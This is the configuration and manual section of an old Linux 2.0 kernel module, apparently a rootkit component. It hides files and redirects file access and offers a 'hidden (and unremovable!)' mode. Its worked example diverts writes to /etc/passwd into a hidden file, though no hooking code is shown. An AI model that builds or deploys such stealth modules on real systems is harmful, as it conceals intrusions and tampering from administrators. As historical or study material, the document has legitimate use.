/*
   Advanced file hide & redirect module for Linux 2.0.xx / i386 
   ------------------------------------------------------------
                 CONFIGURATION & MANUAL SECTION
               (see 'redirection table' for help)
*/

#define VERSION "0.2b"

/**************************/
/*** CUSTOMIZATION AREA ***/
/**************************/

/* Define this for hidden (and unremovable!) module instead of */
/* normal one. Usually it's good idea if you want to hide this */
/* module and ensure it can't be removed, but if you're just */
/* testing or debugging it - turn it off. */
/* #define HIDDEN */

/* Inode database rebuild interval (in calls :) - don't touch unless */
/* you really need it... This one is good, believe me. */
#define INTERV 100   

/* Verbose operation */
#define VERBOSE

/* Debugging output (for test purposes only) - generates a lot of junk. */
/* #define DEBUG */

/* Default error code for hidden files - don't change */
#define ERR ENOENT

/* Redirections table, in format:

   { "real_file" , "redirector", flags, new_flags },
   ...

   Attempt of access to "real_file" (of type specified by 'flags') will be
   modified according to 'new_flags' and redirected to "redirector" file.
   If no redirector is defined (NULL), "real_file" become simply hidden.
   Flags are compatible with open(...) parameters. Basically, you should use:
   
   O_RDONLY	- perform redirection of read attempts
   O_WRONLY	- perform redirection of write attempts
   O_RDWR	- redirect both read and write access
   O_STRICT     - redirect ONLY given access type (eg. RDONLY, but not RDWR)
   
   Additional conditions:
   
   O_CREAT	- redirect only file creation attempts
   O_EXCL	- redirect only 'exclusive' access requests
   O_TRUNC	- redirect only truncation attempts
   O_APPEND	- redirect only append writes
   O_NONBLOCK	- redirect only asynchronous access
   O_SYNC	- redirect only synchronous access
   ...		- (and other, less or more sophisticated options)
   
   Parameters grouping should be done with '|' (binary or) operator.
   For 'new_flags' field, you can specify new access mode, or just
   modify requested one. To preserve/modify full, original access mode,
   please use O_NOCHG. For original access type, use O_ACCNOCHG.
   
   Assuming - to redirect write access on /etc/passwd to /tmp/funny,
   adding O_APPEND flag, then to hide /tmp/funny, you should use:
   
   { "/etc/passwd", "/tmp/funny", O_WRONLY, O_ACCNOCHG | O_APPEND },
   { "/tmp/funny", NULL, O_RDWR, 0 }
   
   Oh, operations are checked on inodes level, and inode<->filename
   database is rebuilt after every 100 open() calls - if file appeared
   after installation of this module, it may take a few seconds to
   update data...
   
   Module installation: insmod afhrm
   Module removal: rmmod afhrm
   
*/
   
  { "/test1", "/redirected", O_WRONLY, O_ACCNOCHG | O_APPEND },
  { "/redirected", NULL, 0, 0 }

/*********************************/
/*** END OF CUSTOMIZATION AREA ***/
/*********************************/
